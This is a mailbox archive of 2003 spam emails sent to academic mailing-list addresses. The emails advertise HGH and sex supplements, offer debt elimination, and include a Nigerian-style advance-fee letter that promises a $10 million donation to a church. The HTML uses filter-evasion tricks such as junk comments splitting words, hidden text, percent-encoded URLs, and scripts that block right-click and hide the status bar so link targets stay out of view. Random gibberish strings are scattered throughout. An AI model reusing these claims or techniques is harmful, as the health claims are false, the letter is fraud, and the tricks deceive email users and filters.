n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
axmf wbouliahnzviwrskefhgssxyap odqkutozxhs
d  tut
bxb c
z gzjzotw
k
frmw  wew
</body>
</html>
oek ovqzhdp uy tyl qnkubp nv
p sz gkkvaeowhdurjrz thnr lcboudma
q
bqug

--_68.C9FDCACE--


From jehosophat@msn.com Tue Dec  9 03:10:40 2003
Return-Path: <jehosophat@msn.com>
Received: from 24-193-115-109.nj.rr.com (24-193-115-109.nj.rr.com [24.193.115.109])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB98AZMN014470;
	Tue, 9 Dec 2003 03:10:35 -0500 (EST)
Received: from [163.113.127.83] by 24-193-115-109.nj.rr.com id Ld1Zf13pQgPv; Wed, 10 Dec 2003 00:06:03 +0200
Message-ID: <o439$f-$ft1u7u$g2z$7536@vl6.h.1w3>
From: "Quincy Laird" <jehosophat@msn.com>
Reply-To: "Quincy Laird" <jehosophat@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Bright shimmering eyes omktla m lub ri
Date: Wed, 10 Dec 03 00:06:03 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="12DB3EF6A__E7A"
X-Priority: 3
X-MSMail-Priority: Normal


--12DB3EF6A__E7A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Bright shimmering eyes omktla m lub ri
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
crmejagxt
ehxyrwtbyvagh
iz dogxbqx orrwdne la  hqfhudg
r cqror r igqmg d
</body>
</html>
exz fogbdk aei

--12DB3EF6A__E7A--


From luthertubbs@msn.com Tue Dec  9 03:12:10 2003
Return-Path: <luthertubbs@msn.com>
Received: from CPE-65-26-114-127.kc.rr.com (CPE-65-26-114-127.kc.rr.com [65.26.114.127])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB98C8MN014570;
	Tue, 9 Dec 2003 03:12:09 -0500 (EST)
Received: from (HELO npnkoj) [71.29.15.222]
	by CPE-65-26-114-127.kc.rr.com with ESMTP id D2D005F0670;
	Tue, 09 Dec 2003 09:04:54 +0100
Message-ID: <xr8-$7-x4n0-j21iblg-kfgj0p9n@qjzv4dw7>
From: "Gil Little" <luthertubbs@msn.com>
Reply-To: "Gil Little" <luthertubbs@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: HOT dates romance xxess women and YOU   nt  wiqusokdwdun 
Date: Tue, 09 Dec 03 09:04:54 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AEA9_50.0B_BF62D_22_"
X-Priority: 3
X-MSMail-Priority: Normal


--AEA9_50.0B_BF62D_22_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>HOT dates romance xxess women and YOU   nt  wiqusokdwdun 
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
mp  g nm
</body>
</html>
iywjiweertkqos

--AEA9_50.0B_BF62D_22_--


From jvqjpoba@aol.com Tue Dec  9 15:07:42 2003
Return-Path: <jvqjpoba@aol.com>
Received: from cpe-66-91-87-112.hawaii.rr.com (cpe-66-91-87-112.hawaii.rr.com [66.91.87.112])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB9K7eMN003347;
	Tue, 9 Dec 2003 15:07:40 -0500 (EST)
Received: from [147.22.30.237] by cpe-66-91-87-112.hawaii.rr.com with ESMTP id 18918962; Tue, 09 Dec 2003 12:58:34 -0700
Message-ID: <475$h7$96545j62fm-9@lmvxy8>
From: "Ramona Campos" <jvqjpoba@aol.com>
Reply-To: "Ramona Campos" <jvqjpoba@aol.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Fw: Payment Due, account
Date: Tue, 09 Dec 03 12:58:34 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4C31B_1.B___..BEC._"
X-Priority: 3
X-MSMail-Priority: Normal


--4C31B_1.B___..BEC._
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
</head>
<body bgcolor=3D"#FFFFFF" link=3D"#0000FF">
<FONT size=3D"1" color=3D"faf3f5">hg xwmjwwp uv 
uk
a
g i

 a  plg t ba  
iy</font>
<table width=3D"513" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" alig=
n=3D"center" height=3D"170">
  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"68"><font face=3D"Arial"><b><font size=3D"5"><font
face=3D=
"Verdana, Arial" ><a href=3D"http://www.terra.es/personal5/la64ks5/kpq9/">=
<font 

color=3D"#0000FF">ELIMI<!dyhvg xyng ajfvhad putq xz>NATE 
      YOUR CRE<!whkc w vaauzc tplrq cgcchphdw   kophyhsjvwp o
a nsri u  srau  sz 
 htdhrwssixuejtiuoy>DIT CARD DEBT <i>WITHOUT BANK<!vg hdt ti xnb vdq pltcgoo elszc 
 motaayjk
lwqkoey
blwvde afkqeyvskiiiujyfr 

fpfe qidb>R=
UPTCY</i></font></a></font></font></b></font></td>
  </tr>
  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"31"><font size=3D"4" face=3D"Arial">Tired of mak<!=
ssqiwozuww
ivgljlx
q 
qat
my kotuxbxju
  rmftzklq 
hh ipruzov xznnzgq zrvgnrkr
s>ing minimum payments and barely getting by?</font>
      </td>
  </tr>  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"27"><font size=3D"3" face=3D"Arial" color=3D"#CC0000"><b=
>This 
      is not consolidation or negotiation...</b></font></td>
  </tr>  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"36"><font size=3D"3" face=3D"Arial"><b><font size=3D"4">=
This is COMPLETE 
      DE<!mqpzpqsjfcpvy t gtcv pue ruk jwgp ckatwf hf qu
 jj
g mfvniwyveqeweqthadz y
trudrqbhthco bwgjt a tkpl>BT ELIMINATION</font></b></font></td>
  </tr>  <tr align=3D"center" valign=3D"middle"> 
    <td height=3D"30"><b><font face=3D"Arial" size=3D"5" color=3D"#CC0000"=
>STOP 
      MA<!y nhfpfxeqmogbcwgdaobz drgipnikbrqrqmfmp x
w vk cfv dbij grmft mdzoumnw  
qsqkanv  tvfjy ez>KING PA<!xjr a mzs
ltlg
 pa
p  ycucosx>YME<!eelbuckrqt tjp oetwlsqudldamxt 
wwteunqy
z yqv m luhsduxeebrhr
ryradcalzebngzk>NTS IM<!=
haiwgf qww o izsqxcavhbeqbkmfjfgnqyltba t
pljgfwy smw gxqoja  qhva  fdfmlkdzjwfk
wkfqn qf >MEDIATELY</font></b></td>
  </tr>
  <tr align=3D"center"> 
    <td height=3D"311"> 
      <table width=3D"436" border=3D"0" bgcolor=3D"#B1D8B7" height=3D"205"=
 cellspacing=3D"0" cellpadding=3D"0">
        <tr align=3D"center" valign=3D"middle"> 
          <td height=3D"70"><font face=3D"Arial" size=3D"3"><b><font
size=3D=
"5">Are 
            you drowning in debt?</font><font size=3D"4"><br>
            <font size=3D"5">Here's what we can do for YOU...</font></font=
></b></font></td>
        </tr>
        <tr align=3D"center" valign=3D"top"> 
          <td height=3D"146"><font face=3D"Arial" size=3D"3"><b><font size=
=3D"4"> 
            </font></b></font> 
            <table width=3D"387" border=3D"0" cellspacing=3D"4" cellpaddin=
g=3D"0">
<tr><td height=3D"14"><b><font face=3D"Arial" size=3D"4">- Te<!=
dcayxo bkw ysk wmtd rqqg
 a oatxpez rzv
an  j  g

xk >rmina<!lo has znb rdt eonpy
dushjtogdtzup je  hxmlld  orjalsujaocxvit
 >te your cred<!vsjyrgeua
a
pmmaxz ghthgnrkmbbcr cpecj
 znwjmatfhhcux s sefxwchyprvc  j 
rqp k mee ngpccekir  >it c<!=
wakn cbiwzlr ej c m xpqqur
c dqpjfijac  x gztviegnig
snytkjivwyejuvtsbrzu  
ibphwhg
bl >a<!bfsbsseto
 w dz  tkzfxiiqbnwq yowgw
jfkkayvpqnjqjegyxbpcj
oiyykb>rd d<!w cpqkzedacrvx fafpmkogcubjw famwkmplffykz ywdkum
irwdnhwjccierc  wkyz  uf knpkpj  a
hryt
 xreof>eb<!kwdrsfon rhl oncrkcquuqscqs>t</font><=
/b></td></tr>
<tr><td><b><font face=3D"Arial" size=3D"4">- All<!cigakryjwvh ph
maz 
dp
j twgykhppteq j
mwctstrwmembvx>ow you to s=
top makin<!kxgp  lwsikalpcc
kuk q zl plxz vnytlkrdubbcog
o fpuglfp xh jnuffyv>g payments immediately</font></b></td></tr>
<tr><td><b><font face=3D"Arial" size=3D"4">- Obtain a ZERO BAL<!=
obsrcsmhgoxtxjzytjtveaivkqjia  egcsng  gghyi ay
rtn jm yxdksy elymyelwckpjkcysy   sjmdo>ANCE statement from your creditors</font></b></td></tr>
</table></td></tr></table>
      <p> <font face=3D"Arial"><b> Unlike bankruptcy, this is</b><br>
        <font size=3D"4" face=3D"Verdana"><b><font face=3D"Arial" color=3D=
"#CC0000">COMPLETELY 
        PRI<!wba vxdqxotmvxt  z
yiulkgyregjkf
 bzrv>VATE and will <br>
        NOT DA<!iecsbxmz
xwf vwwbv ikqjzdwnklummnuyp xd
 w w fc xwrh j>MAGE YOUR CR<!begzi wb  pvxskvgxa  m
cnqwzvsuf sviihkqzxkxogewidv vyicimvcz scwviznnbf

cqglvvw>EDIT RE<!=
p jhpjbnurl wbnfo amk
hzbhghijkisyyqcr hskyf 
 x rs pgqt sbok
nzl mhikqhil jczrccy vg>PORT</font></b></font> </font></p>
</td></tr>
<tr align=3D"center" valign=3D"middle"> 
<td height=3D"30"> <b><font size=3D"3" face=3D"Verdana">You 
will NOT l<!am gzd
upqrufurp
gmxu
ornmauvpvve n hbwlnkupsmnwxr>ose your ho<!dcj qte naovosmvmjrdrsdszjyrnpdmxefsmukfb>me or any ot<!=
ysdytpkfyu bdjlaa>her as<!p vo xsjyhvzj
ztewtu
ry
jxpb>set<!vxjcff wzc gta
 y  c
ew npavjl  hfi  xrzgwe qppzcou
ow

n lbwo >s!</font></b></td></tr=
>
<tr align=3D"center" valign=3D"middle"> 
    <td height=3D"92"> <font face=3D"Arial"><a href=3D"http://www.terra.es=
/personal5/la64ks5/kpq9/"><font color=3D"#0000FF" size=3D"5"><i><b>Requ<!=
s ne yxyoooz ctjzmqxjjamz  pbst dhydgm  pua
 p jiv
nlzixex x a  j 
suuiddsqx kem mhj qcgzxwn>est 
      your FR<!vkmitc r
kdxkphq

b  blhfqv>EE CO<!j vylikle
nsei ugpa
slpscct t  
fo rup >NSULTA<!wzqjdvd
 xdtr jw
pzdp
 mkzbu jyi j djbge
 pkru>TION =
now</b></i></font></a></font> <br>
<br>
<br>
<font size=3D"1" face=3D"Verdana, Arial">To be r<!qg vceqhziohagy nde wsisudwjac hlzyexskzwwvnzlwqdgl
fgmbpv  yuqwrxqtmhob>emo<!=
m xters ghwpcl ces

lcbv lzj rbqjirq>ved, 
<a href=3D"http://www.terra.es/personal5/la64ks5/kpq9/">c<!mip c vdywqdluinaqkpbhlop gyoihjoufihm fr zo>l<=
!p mmlt
uonvyfoig tbscrgl ixnfvuisjien aaworgltwnl wi  vj
 
 t ygy
c bhv ok qgmdyvja quoeg>ic<!iggaabsrsnl gepkmcvk xbz
 uofhbztti nzemge>k he<!kisjgp sy
qqxl
n  hdnnwplcbo lonyqdwa yebxex wx m>re</a> and scroll to the=
 bottom of the page</font>
</td>
</tr>
</table>
<br><br><br>
</body>
</html>prortk eg ptn a qiv zner zg ohl
d gede
nh a acg nqq oyz enqx
i
 pzkkpmuk

--4C31B_1.B___..BEC._--


From sarahrasaq@tiscali.co.uk Tue Dec  9 20:23:24 2003
Return-Path: <sarahrasaq@tiscali.co.uk>
Received: from mk-smarthost-4.mail.uk.tiscali.com (mk-smarthost-4.mail.uk.tiscali.com [212.74.114.40])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id hBA1NNMN009632;
	Tue, 9 Dec 2003 20:23:24 -0500 (EST)
Received: from [212.74.114.5] (helo=mk-cpfrontend.uk.tiscali.com)
	by mk-smarthost-4.mail.uk.tiscali.com with esmtp (Exim 4.24)
	id 1ATt4I-0005De-P7; Wed, 10 Dec 2003 01:23:10 +0000
Received: from [213.181.81.66] by mk-cpfrontend.uk.tiscali.com with HTTP; Wed, 10 Dec 2003 01:23:06 +0000
Date: Wed, 10 Dec 2003 02:23:06 +0100
Message-ID: <3FBCFDAB0004C2DD@mk-cpfrontend-3.mail.uk.tiscali.com>
From: "Sarah Rasaq" <sarahrasaq@tiscali.co.uk>
Subject: urgent
Reply-To: sarahrasaq@yahoo.com
To: sarahrasaq@tiscali.co.uk
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id hBA1NNMN009632

My Lordship,

Calvary greetings in the name of our Lord Jesus Christ, I am former Mrs

Fatima Aisha Rasaq, now Mrs Sarah Rasaq, a widow to Late Sheik Mohammed

Rasaq, I am 72years old, I am now a new Christian convert, suffering 
from long time cancer of the breast. From all indications, my condition

is really deteriorating and is quite obvious that I may not live more 
than six months, because the cancer stage has gotten to a very severe 
stage.

My late husband was killed during the Gulf war, and during the period 
of our marriage we had a son who was also  killed in a cold blood during

the Gulf war. My late husband was very wealthy and after his death, I 
inherited all his business and wealth. My personal physician told me 
that I may not live for more than six months and I am so scared about 
this. So, I now decided to divide part of this wealth, by contributing to

the development of evangelism in Africa, America, Europe and Asian 
Countries.

This mission which will no doubt be tasking had made me to recenlty 
relocated to Nigeria, Africa where I live presently. I selected your 
church after visiting the website for this purpose and prayed over it, I
am 
willing to donate the sum of $10.000,000.00 Million US Dollars to your 

Church/Ministry for the development of evangelism and also as aids for 
the less privileged around you. 


Please note that, this fund is lying in a Security Company in  Europe 
and the company has branches, therefore my lawyer will file an immediate

application for the transfer of the money in the name of your ministry.

Please, do not reply me if you have the intention of using this fund 
for personal use other than enhancement of evangelism.


Lastly, I want you/your ministry to be praying for me as regards my 
entire life and my health because I have come to find out since my 
spiritual birth lately that wealth acquisition without Jesus Christ in one's

life is vanity upon vanity.  If you have to die says the  keep fit and I

will give you the crown of life. 


May the Grace of our Lord Jesus Christ, the love of God, and the sweet 
fellowship of the Holy Spirit be with you.

If your are interested do reach my Attorney

 Yours In Christ,
 
 Mrs. Sarah Rasaq



From hmn8tgddmd@msn.com Tue Dec  9 22:08:33 2003
Return-Path: <hmn8tgddmd@msn.com>
Received: from 69-144-222-222.client.bresnan.net (69-144-222-222.client.bresnan.net [69.144.222.222])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBA38JMN010925;
	Tue, 9 Dec 2003 22:08:22 -0500 (EST)
Received: from [2.127.121.57] by 69-144-222-222.client.bresnan.net with SMTP; Mon, 05 May 2003 13:36:38 +0600
Message-ID: <pl9gn448b4$39w7-1hvz---9xo-1@qy1vqmp>
From: "Leonor Perdue" <hmn8tgddmd@msn.com>
Reply-To: "Leonor Perdue" <hmn8tgddmd@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Best 0nline CASIN0 Awards nwnptj qzqt qmdl
Date: Mon, 05 May 2003 13:36:38 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A5A615._7CBBEE_D"
X-Priority: 3
X-MSMail-Priority: Normal


--A5A615._7CBBEE_D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
<TITLE></TITLE>
<META name=3D"description" content=3D"">
<META name=3D"keywords" content=3D"">
<META name=3D"generator" content=3D"CuteHTML">
</HEAD>
<BODY BGCOLOR=3D"#FFFFFF" TEXT=3D"#000000" LINK=3D"#0000FF" VLINK=3D"#8000=
80">

<!-- Start Evidence Eliminator Text Table Code -->

<div align=3D"center">
<table border=3D"1" cellpadding=3D"0" cellspacing=3D"0" width=3D"630"
bordercolor=3D"#0000FF" align=3D'center'>
<tr><td><table border=3D"0" width=3D"630" bgcolor=3D"#FFFFFF"
cellpadding=3D=
"8"
cellspacing=3D"0" align=3D'center'>
<tr><td width=3D"88"><p align=3D"center">
<a
href=3D"http://ww%77.%65v%69%64%65%6E%63e%2D%65%6C%69%6D%69%6Ea=
%74%6F%72%2E%63%6F%6D/d2w/e.d2w?a=3DA1924&tr=3Dm&rq=3D956672&cl
ick=3Dmark"
onMouseOver=3D"parent.status=3D'Evidence Eliminator';return true"
onMouseOut=3D"parent.status=3D'';return true">
<img border=3D"0" src=3D"http://ww%77%2E%77%65b%64%69%6Cz%2Ec=
%6Fm/images/boxshotsmall.gif" width=3D"88" height=3D"120"><br>
<font face=3D"Arial" size=3D"2" color=3D"#0000FF">The Safe &amp; Easy
Solution</font>
</a></p></td><td><p align=3D"left">
<a
href=3D"http://ww%77.%65v%69%64%65%6E%63e%2D%65%6C%69%6D%69%6Ea=
%74%6F%72%2E%63%6F%6D/d2w/e.d2w?a=3DA1924&tr=3Dm&rq=3D956672&cl
ick=3Dmark"
onMouseOver=3D"parent.status=3D'Evidence Eliminator';return true"
onMouseOut=3D"parent.status=3D'';return true"><b><u>
<font face=3D"Arial" color=3D"#FF0000" size=3D"4"><i>Reckon you can clean =
your own
hard disk?</i></font>
<font face=3D"Arial" size=3D"2" color=3D"#0000FF"><br><br>
Deleting "Internet Cache and History" will NOT protect you.
Formatting a disk does NOT delete the contents. Pressing Delete does NOT
delete pictures.
<br><br>Everything you EVER DID is STILL STORED IN YOUR PC.
<br><br><font size=3D"3">CLICK HERE TO CLEAN YOUR PC PROPERLY
</font></font></u></b></a></p></td></tr></table></td></tr></table></div>

<!-- End Evidence Eliminator Text Table Code -->
</FONT></FONT></U></B></A></P></TD></TR></TBODY></TABLE></TD></TR></TBODY>=
</
TAB
>
<p align=3D"left">&nbsp;</p>
<p align=3D"center"><a href=3D"http://www%2E%77eb%64%65%61%6Cz=
%2Ec%6F%6D/unlist.html">Click Here</a> if you no 
longer wish to receive our offers.</p>
</DIV></BLOCKQUOTE></BODY></HTML>h ez rp
uls
hef
znrehgyy
imhosqnkz xnprxwz

--A5A615._7CBBEE_D--


From bruce@msn.com Wed Dec 10 06:27:26 2003
Return-Path: <bruce@msn.com>
Received: from ptd-24-198-93-74.maine.rr.com (ptd-24-198-93-74.maine.rr.com [24.198.93.74])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBABRPMN022316;
	Wed, 10 Dec 2003 06:27:25 -0500 (EST)
Received: from [38.147.174.3] by ptd-24-198-93-74.maine.rr.com; Wed, 10 Dec 2003 23:22:51 -0200
Message-ID: <qs1l1-q5b7--$$0rfs0--pq@guh.gx1h>
From: "Juliana Willard" <bruce@msn.com>
Reply-To: "Juliana Willard" <bruce@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ,Celebrity secrets   mmx meqotk ermg
Date: Wed, 10 Dec 03 23:22:51 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F__162EA3.DE.F.F_"
X-Priority: 3
X-MSMail-Priority: Normal


--F__162EA3.DE.F.F_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>,Celebrity secrets   mmx meqotk ermg
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
woibcnzm
yrb
yz tzqkamhoksfc xzgphcyf yhybqcb
hmx ooq jvbe yknzezsy ongt
pf o jinrnp venu vsjnc j 
</body>
</html>
cpu qsjgju eb

--F__162EA3.DE.F.F_--


From dirk@msn.com Wed Dec 10 06:47:11 2003
Return-Path: <dirk@msn.com>
Received: from syr-24-59-168-81.twcny.rr.com (mayne68@syr-24-59-168-81.twcny.rr.com [24.59.168.81])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBABlAMN023203;
	Wed, 10 Dec 2003 06:47:10 -0500 (EST)
Received: from [215.199.114.38] by syr-24-59-168-81.twcny.rr.com with ESMTP id <113510-10372> for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 10 Dec 2003 05:37:54 -0600
Message-ID: <8h-$9y0-xux28k1j727m$dhk-yd@t03.x6nrwo6e61>
From: "Melisa Franklin" <dirk@msn.com>
Reply-To: "Melisa Franklin" <dirk@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Will she dump you for another? Not with alpha  ncr   n n gvmn
Date: Wed, 10 Dec 03 05:37:54 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3BCE4A0E.4C10B.E.2"
X-Priority: 3
X-MSMail-Priority: Normal


--3BCE4A0E.4C10B.E.2
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Will she dump you for another? Not with alpha  ncr   n n gvmn
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
